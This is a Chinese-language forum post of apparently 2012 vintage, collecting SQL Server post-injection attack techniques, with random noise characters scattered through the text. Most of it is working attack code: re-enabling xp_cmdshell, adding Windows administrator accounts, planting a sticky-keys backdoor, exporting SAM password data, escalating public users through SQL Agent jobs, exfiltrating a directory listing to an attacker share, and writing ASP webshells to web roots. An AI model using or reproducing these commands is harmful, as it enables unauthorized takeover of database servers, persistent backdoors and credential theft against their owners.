1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号% P A% F/ P' T7 s7 M1 U
恢复方法:查询分离器连接后,
c% O9 b2 J( d* F: N5 Q" D第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
( Q( q* `8 B) N U8 \3 h" `第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( m O; f& s1 }+ ?然后按F5键命令执行完毕, P/ b5 D3 F" L1 g- B) g' [. A
& t$ F0 I* h* x" r% F$ k, Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。), ^$ E0 P$ m& c+ s" L& \
恢复方法:查询分离器连接后,
% g. b4 U ^" O4 v$ G# G7 g第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell") @& Y: y3 D, g, q4 ^" \
第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. ]. h/ ^7 M2 d N
然后按F5键命令执行完毕$ m S- n4 r. R
$ n* p% B3 T4 s* i6 Z3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
. l1 i' R" d7 m0 ]4 `: v4 C" T) l恢复方法:查询分离器连接后,/ R8 v/ E" I4 W
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'( l& f; l( ~ o8 Z! C
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' ; [( Q- j5 }* r! Y# J" U* X3 E
然后按F5键命令执行完毕
" \9 `$ h$ p1 O' _1 e% m2 q
+ w% M) C3 j5 X4 D4 终极方法.+ f w; M8 m! W( ?9 C# l
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:% \3 a1 k! Z) t
查询分离器连接后,
1 d A. ^: ~* E" D! |* W; V2000servser系统:
" v" ]+ a) j0 t( [! ]declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'! L8 z8 o( L1 r, b# r
9 K+ R& D) w5 [# r* t+ Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
& k; }4 K- V, w% c6 h6 v! z4 ]3 ?& i3 X4 x8 G
xp或2003server系统:- k4 s. t2 H _5 I. m& ~
- c. s) x; N9 c+ x7 p9 [8 C, {declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
. n& B& Z) _, d( m" _# W
& a* N9 {( r N" G4 N/ Y& hdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'1 @* u K3 d/ [$ t
E# S, [# \' E8 {! u) v$ h' m5 r d/ b- P4 y* ?" X+ @
五个SHIFT: g3 H2 g. W- h" X$ I2 E) F. [$ c1 ^
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
8 z8 \6 M; b/ D. z _
s2 J4 N, B+ T" I$ j Odeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; , B# {) K5 b5 p6 k
. ^9 x/ b9 b9 bxp_cmdshell执行命令另一种方法
" g) i: M7 W" G% K* a" hdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
- {6 t. T, g, s) L4 Y w( b& x! E! f7 e; I
判断存储扩展是否存在- V% f/ N: q, ^9 W7 [' \* l' g
Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'3 C1 n* S4 t1 U1 Y) l* q
返回结果为1就OK
" \7 Z) r( O m8 O B
- c6 ?8 {$ F) {$ j: i( J4 b
; f8 I/ j" m7 v. w. m上传xplog70.dll恢复xp_cmdshell语句:/ x4 |9 C! X) I# a8 S
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'9 B3 p4 i0 z. ]/ b
1 o: P% z( B p j2 f4 `否则上传xplog7.0.dll$ E9 K* K- N: ?$ q# o& E
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
, ~7 q0 K# o! e. O! O% A
* O% o8 G( j {- Y3 q% n# u4 _% T6 S! B8 X0 y1 l8 }( c) M
# Y M! z) u3 C7 {5 j4 ?首先开启沙盘模式:: @7 R: X7 o* W' j
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1( b) N) R) U1 ]7 J& R" {7 Y
, b! D5 X7 G" x3 R O( n然后利用jet.oledb执行系统命令
, i; q& y& c D- f$ h* S# W* tselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')7 S8 N! H- J6 ^1 e: n
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了6 w% b& n1 [ K4 l" ~( [
" a; ]/ Z1 D7 t% X
, z4 U. ^+ ^% O% E3 j: @
# y ?8 T y8 H0 }/ ]* C恢复过程sp_addextendedproc 如下:
. n8 _: }" E S+ r8 |0 Z6 h, Gcreate procedure sp_addextendedproc --- 1996/08/30 20:13
; _$ n% p% L5 I w@functname nvarchar(517),/* (owner.)name of function to call */
- B8 m, q- D4 C/ K1 T3 p6 y@dllname varchar(255)/* name of DLL containing function */ . k9 ]+ _ |, z- m! H/ S {
as
. K' D5 I3 l7 A* N- p. s. xset implicit_transactions off Z; s( E6 K9 w2 z; U" X& P" F
if @@trancount > 0
: s0 E( T" [% Y% S$ Q* |) Tbegin 0 o4 Y& t {' j' A& q, R
raiserror(15002,-1,-1,'sp_addextendedproc') * L2 V$ E# O( y
return (1)
& _+ ^4 P% i$ A; h4 hend , _% `: E1 s) x1 T
dbcc addextendedproc( @functname, @dllname) ) @: j* b( F& x0 v
return (0) -- sp_addextendedproc * j' H3 k1 C# {- E2 }
GO
+ A! [% | u# Y3 `/ N3 c& k: N) J; B( t+ G! L# @& [, }
X$ R: J' p( O! ~/ E6 J9 C
( Q2 t1 J& Y$ T8 Z+ ~) g导出管理员密码文件
( ^1 {* o7 W6 @* R' o- Vsa默认可以读sam键.应该。
: c- K3 f3 E- \+ j: Yreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg1 {, O @0 ? v* u" y. S
net user administrator test9 g- N: ^4 g( t; A+ z
用administrator登陆.8 J( t, p3 |* k
用完机器后: @; l6 U4 P! A8 P
reg import c:\test.reg
) H& I* q8 h, {2 o" B# x根本不用克隆.
0 T3 X( z8 {: R- V% g1 W7 D找到对应的sid. ' C" ?. ?0 y0 q. U9 O- H
+ u! Y2 I) B, w' p j& k& E2 P
: A- ?, e, X# D+ N5 P
恢复所有存储过程3 J4 h- r, l3 j; C; }' P- {% D% R
use master 8 c8 W6 Q1 G+ y7 U f2 Y$ j4 W; @1 p" {
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
' b8 t; ?+ N m/ K3 P- Wexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
2 [0 s s: h% D9 H9 vexec sp_addextendedproc xp_loginconfig,'xplog70.dll' . H' X% E- B1 B. c
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' % f4 W% N& {6 c* N# m' g
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
5 x j! u$ Y ]exec sp_addextendedproc sp_OACreate,'odsole70.dll' 0 E/ X0 A X3 \ i9 K; O* t) F
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
8 L7 ~3 T' d) s! b7 \. H$ bexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' 1 D: P( q7 d" D* A, L
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
# v4 a0 ? P5 Iexec sp_addextendedproc sp_OAMethod,'odsole70.dll'
, \6 g/ `/ k- T) V( Mexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' # a6 Y1 X0 w' F/ c5 L
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
# t p: a% i* ^: V3 g- f Uexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' - A) x/ v s2 m z- W
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' : u; c1 v2 L L' j
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
+ f2 v4 [# W4 M' wexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' + [( U* x6 |+ f9 a$ W% ?% Q; {' s! q) o0 Z
exec sp_addextendedproc xp_regread,'xpstar.dll'
, e& F' N1 j1 `7 D; Texec sp_addextendedproc xp_regremovemultistring,'xpstar.dll'
; j! {; k. }, C! sexec sp_addextendedproc xp_regwrite,'xpstar.dll' - f$ `. y' N$ _
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'7 V, \* t" S# A5 K/ D4 Z; s
3 A, `6 N0 v7 d% y! j- I# E& G/ g! [. C: y/ I- e( b3 f c
建立读文件的存储过程
* d" p, ]2 m' ~$ J. d/ Z- i$ Z. [Create proc sp_readTextFile @filename sysname
' ~1 B, Z& S: das
i' D; j8 U& ~6 Q/ n0 R5 Y4 } x2 o$ F4 _0 t! ~
begin ; q7 }- ^7 F7 T& q( N; j
set nocount on
/ `6 X3 N6 x& I0 k Create table #tempfile (line varchar(8000))
0 e; P! B N4 |& K% q exec ('bulk insert #tempfile from "' + @filename + '"')
3 ]0 w. K+ M* B) K X select * from #tempfile
: U i1 f1 I% P; A3 M drop table #tempfile* j+ ~/ s7 Y6 x5 M6 q- a
End. l8 F2 @% Y3 ~
1 ~/ N5 o5 z+ d* w* {1 @! bexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件4 u, ~/ D1 x# `
查看登录用户
: q( a0 R, e0 G* e; WSelect * from sysxlogins
5 o# v0 R5 |1 ^! k6 y0 a9 `, p/ a9 O8 n5 t6 L
把文件内容读取到表中
* P& e0 {. }% @0 iBULK INSERT tmp from "c:\test.txt"/ a" l. \6 C8 Z5 K+ d
dElete from 表名 清理表里的内容7 L7 Y. n' e! C9 G0 ^3 F4 ^
create table b_test(fn nvarchar(4000));建一个表,字段为fn
0 L' n+ J; t2 T+ ]- C% [4 h# C; L% k3 O$ d
2 m$ ^4 x& R: x
加sa用户' t+ G. H7 _! f& l) ~" R0 F
exec master.dbo.sp_addlogin user,pass;
! I- }; O* y j2 s7 Eexec master.dbo.sp_addsrvrolemember user,sysadmin- I; a* g2 _. b4 F5 a% T
) u# ], ]9 n/ g# i/ i/ O) {
8 H( s& t- D! `( Y" H# u, @2 ~
; u t- s! `# V. C读文件代码9 X. d0 ]8 u `# c1 P
declare @o int, @f int, @t int, @ret int
7 ?+ d6 e! i V, n1 ?+ ^9 r- ~declare @line varchar(8000)
. O+ i) `: }- x% bexec sp_oacreate 'scripting.filesystemobject', @o out
c& K- U- [2 n3 I, g% G5 @2 Rexec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
! b: d* m5 o$ l+ {exec @ret = sp_oamethod @f, 'readline', @line out U/ L$ n! \( m! X* m. i- B6 l4 S
while( @ret = 0 )! D) _' O, _+ m$ s8 `
begin
& p! g2 z4 S: fprint @line
, Q, `4 F( H% e; q' d Fexec @ret = sp_oamethod @f, 'readline', @line out: q- n0 o- A) \" |, y0 O, r+ z
end* v( p/ D9 L& r6 V! Y- G8 x: N
* \6 K4 e R3 w" @- Q
. o9 V3 h9 l; h" X
写文件代码:
( y+ |0 _% N; O U4 [ B& ydeclare @o int, @f int, @t int, @ret int3 N& P( Q/ q: e" [/ h
exec sp_oacreate 'scripting.filesystemobject', @o out
) `+ k0 t0 D' M z" t& n2 cexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
1 ]6 o+ D1 I7 v; eexec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》
: t8 C) l a$ O% Z( A% p) W) [# z) K6 G- H
9 j5 l8 C% P2 l! @- f, N" D添加lake2 shell) h% d9 _3 x/ J. X0 h, E; r4 J* `# |$ i6 i
sp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'0 x% R9 k k2 F+ t: i- ?0 l
sp_dropextendedproc xp_lake2$ }0 V$ P+ T# A4 ^1 [- O8 j% e
EXEC xp_lake2 'net user'
3 M2 Y% `4 g" i2 A; C* |1 ?: A' E$ S: Y) h3 O
7 Y6 T1 y0 K1 t Y0 |0 h/ I
得到硬盘文件信息 ` Y% n# [* ^8 Q+ C4 Z, G$ k
--参数说明:目录名,目录深度,是否显示文件 , O1 l! ^, E( }- ^# j; H8 J
execute master..xp_dirtree 'c:'
1 m8 R# c P8 [# B% w% y8 O$ y" Uexecute master..xp_dirtree 'c:',1 # T: E$ m( c0 v, o
execute master..xp_dirtree 'c:',1,1
$ Z5 c8 ]) O+ \& B# S
+ t$ ^9 H# `: F4 Y: t/ U4 D- J& _, u( S
读serv-u配置信息
% f- f; F& F% m. [2 ^0 iexec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt', ~* B& W# `: g) G* p- \9 {
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini': x: i" J6 R4 w3 i* O7 u/ v4 q
( m. d. ]; @- b* m通过xp_regwrite写SHIFT后门
( A) y/ `1 S& ^; m! M' ~exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--4 Q$ ]. ^4 f( D* Y
* X1 U/ J+ q( j- u9 b$ d" T/ E& t
) j( m7 ]8 u' l0 U! u* p
9 c a5 Y5 M: B( ]# f: D2 D ?找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';0 b1 ]! g; H& ^$ \' ]
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了+ }9 Q ~/ {5 {1 @6 m& U& b- q! y9 Z
# E8 d" ~$ _6 ~! T7 JEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'3 Z" J t8 |; Y& c9 Z5 p+ z
% f+ S S9 ]" K8 A4 \# y3 L: |/ t/ o
% e; Z3 S0 n: b# `# T3 O9 m& ^sql server 2005下开启xp_cmdshell的办法8 q+ v+ B$ e {( ~
$ x& ?( l0 ~! D& {EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;* ]. E$ J1 _/ H' n- }' J; z
' V$ d# i9 B4 BSQL2005开启'OPENROWSET'支持的方法:/ g& D! }1 G# s5 x) v) Y
/ w& d4 U, z! E. r: t _# f! cexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
( R7 ~8 J1 N. A5 X% w7 ?) |9 S4 k8 @& ~# U1 ]0 F6 N6 L
SQL2005开启'sp_oacreate'支持的方法:
5 @# A# M$ W- Y
: N2 _' }& f }2 T! C( w5 wexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
# C9 b$ U" R2 V7 `, y- a* A0 B5 a
1 z* Y6 _4 x8 ]" k& p; }. @
6 P; [0 T: F* T0 o7 }8 Q8 p3 x4 C5 V" ^% o# t, E5 D3 M O3 Q9 n e
# \3 I- {3 n- e3 N3 b2 o
5 {) u' l( S" q {$ x
, v, S% R6 ^* n
4 F/ @' ~, n: W* U$ l6 L( A
: x" L. e$ J2 A* _- r
( c# |' u# V7 `! _9 w1 j+ _0 a" w2 c# E. z2 g. O T
5 Z+ e% g" G0 b0 C0 M A7 j
7 c5 l6 G8 }- N0 A. O% j$ j1 `( Q3 M1 D+ ]
F9 P; b: X' y: m) R ?" P
4 B! Q( D2 @: z( I1 ]2 R0 O$ ~6 y& c- p& Y
+ G* E8 S5 v; S {2 v" r
4 D1 i& m1 l) s
# K: e. I) x% E4 ^: a0 n, T
4 I& T$ o1 ~2 K- D: T- m# V5 N# D8 t1 u( m! c, d
- t7 ?3 B" [) G" N1 k; r
5 a# \$ u7 V: k' z7 F+ @7 X4 i$ b2 I* h2 U1 u
以下方面不知道能不能成功暂且留下研究哈:; X) O9 S1 k9 E
4)
* R W. o7 A7 J. f( Ouse msdb; --这儿不要是master哟
' I) B; f3 ~: q8 bexec sp_add_job @job_name= czy82 ;
' L3 F, J; a9 B" Rexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
, }( L1 x8 u+ Y7 C, V% ^exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;9 H! C9 u+ t1 M0 y; p
exec sp_start_job @job_name= czy82 ;
- \' a( o2 I! v1 w, K' I# F7 N$ L: p$ ^
利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以' Z3 [, F- R2 U$ K: c
执行tsql语句了.
$ m7 U3 R; F6 `' \对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
- l( X1 E( g% a0 [9 U2 A3 n, H. J第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
& Z! T; p7 ^/ ^6 Bnet start SQLSERVERAGENT
" o/ Z! X$ a$ J" D3 w
% K+ c8 F$ u" D3 a, n对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的3 v* k( V3 I/ Z) k
USE msdb
6 d: M9 y3 v2 K. n" @0 UEXEC sp_add_job @job_name = GetSystemOnSQL ,
% S: s5 J; v$ X `0 {, u9 c5 G' Q2 q@enabled = 1,
( ~1 _; l' r! A/ x5 h+ K7 D@description = This will give a low privileged user access to- v( n$ [$ ~ A/ R; E
xp_cmdshell ,
4 A$ ]# Q0 q) N@delete_level = 1- P" @: H- U0 g6 L7 x6 o |: Y: J
EXEC sp_add_jobstep @job_name = GetSystemOnSQL , |7 r* \$ }) N: Y' @% ~& q* ^' y
@step_name = Exec my sql ,
% n* g6 L: B) g4 r5 F* h/ K- [@subsystem = TSQL ,
, M+ x |9 ^5 Q* K& p@command = exec master..xp_execresultset N select exec- z+ D' q1 B5 p; X
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master
8 N8 V2 S' I1 d/ a0 M: j2 U% bEXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
' a4 Q7 {) d& x% r+ Z5 j) S@server_name = 你的SQL的服务器名 3 u$ l) C5 Y) @; P" B3 S" N( g( m
EXEC sp_start_job @job_name = GetSystemOnSQL # i3 _ p& [) u5 Y2 q- ?$ }. e
% u1 @) c' }/ p
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
, q3 J4 F6 B6 a8 Y9 k才让我们可以以public执行xp_cmdshell
) w. G# Q8 L- Q- J# |1 `+ j. e
& D. z9 K! G! _% A- b8 Y5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)
/ c. g3 h* i. q在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
# |. @" ?5 Q( Z5 q0 Y2 `8 Z. [0 [9 ~ p1 I! g" t1 k
USE msdb
- F8 u" z3 V, hEXEC sp_add_job @job_name = ArbitraryFilecreate ,
9 O9 A! w- {( z@enabled = 1,- u6 H' W4 Y' P) f B/ ?/ V" C
@description = This will create a file called c:\sqlafc123.txt ,0 e6 {+ G H6 ~( N) ?* B
@delete_level = 1
3 z4 {3 @* U/ S$ H( BEXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,
$ B4 n, F7 v( V* D, N0 u+ X@step_name = SQLAFC ,
$ u# T6 V ?( g# a@subsystem = TSQL ,: {) t: q6 u \! c3 ~, h
@command = select hello, this file was created by the SQL Agent. ,. L u3 T/ X6 I0 m S6 i7 e
@output_file_name = c:\sqlafc123.txt % H: t! ^: Z: H. T
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
) w; \0 C' S$ ?4 G J. c@server_name = SERVER_NAME
) y6 ]5 B A. G' I0 hEXEC sp_start_job @job_name = ArbitraryFilecreate 7 a! e( |' R( K% R7 Z- c
3 R! p3 y6 v7 y; e8 Q5 j
如果subsystem选的是:tsql,在生成的文件的头部有如下内容
, X7 k6 w9 L( Z# G
0 E; e; O x; r7 {- i??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
; o. X# Y0 l5 v( ]; C----------------------------------------------
8 O% t. Z" H9 L* l+ ehello, this file was created by the SQL Agent.; N" T2 v. Z; d" U: M; [
4 `6 h7 ]3 V7 e4 h, \# n: N
(1 ?????)2 N( y, S$ x X$ V# N
5 b2 n5 ] s/ n# \/ }所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员
+ s: E% t% Z7 U命令的vbs文件到启动目录!
9 ^% M: B2 { T3 L) ^1 _
# ^0 L' \4 K( R4 V. b0 u* H6)关于sp_makewebtask(可以写任意内容任意文件名的文件)+ B* C/ l" p) D) ]. }7 F9 K3 r
关于sp_MScopyscriptfile 看下面的例子# G, l2 k) K8 y4 B3 b
declare @command varchar(100) - o4 z4 {' ?! y% S# ?
declare @scripfile varchar(200) % N: O# A) e% K* C
set concat_null_yields_null off
! G- @0 |- X7 Y1 O7 T9 ?select @command= dir c:\ > "\\attackerip\share\dir.txt"
5 I, U" X u+ t1 c Wselect @scripfile= c:\autoexec.bat > nul" | @command | rd " 5 U3 F- g- `7 t$ n) o$ g
exec sp_MScopyscriptfile @scripfile ,
3 F" D. B6 o" K; i& c
( b5 c8 A- K3 L6 b \$ H这两个东东都还在测试试哟3 f! h0 e" q" | r9 @
让MSSQL的public用户得到一个本机的web shell 8 S& o3 V- I. ?% e
7 n) t/ T2 [: w
sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,+ G. P& \( S Q* G6 [' {
--@query= select <img src=vbscript:msgbox(now())>
6 L3 I3 A# a D. n+ r! @( J. J, |--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> 4 N# s L6 } i3 Y' M
@query= select
/ f1 C! W' O+ V6 D$ c<%On Error Resume Next * V% i; @. X/ R+ F. w5 k# j! |
Set oscript = Server.createObject("wscript.SHELL")
0 N6 S- R- Q; R$ j- [3 u! t4 f lSet oscriptNet = Server.createObject("wscript.NETWORK") - K+ x1 V: i" X* ?: e
Set oFileSys = Server.createObject("scripting.FileSystemObject") ' ~/ @ _6 \8 T9 r2 c; A( O
szCMD = Request.Form(".CMD") 6 h' U- R% G1 A7 D. A+ C) K
If (szCMD <>"")Then ) e ?" l: B+ A+ m$ t1 e+ a! O
szTempFile = "C:\" & oFileSys.GetTempName()
( M7 y( `; z3 ECall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
( m3 o H0 K% S5 {: YSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) ; R) @7 O' d: I- M
End If %>
" L8 A' \$ V" [. P/ T<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST"> : L% F6 s }* U$ X3 N- L
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run"> 0 i7 T8 c7 f4 F. n8 ~1 t5 d8 }1 C
</FORM><RE>
6 E, s# j6 i' O<% If (IsObject(oFile))Then
+ @# v, A$ b/ D# B6 Y2 e8 BOn Error Resume Next : o) l" V4 v5 v( u8 I2 j7 L* m
Response.Write Server.HTMLEncode(oFile.ReadAll) 5 l2 M6 ~+ F! L# F; o3 J
oFile.Close
& q& w* d) N! {; N6 B' ^Call oFileSys.deleteFile(szTempFile, True)
. e( p- g l- p1 w1 m& SEnd If%>
- Y+ k0 J' q9 V( s$ ~; F</BODY></HTML>
9 j3 B( `! _. S0 _ |
发表于 2012-9-15 14:37:30
收藏
支持
反对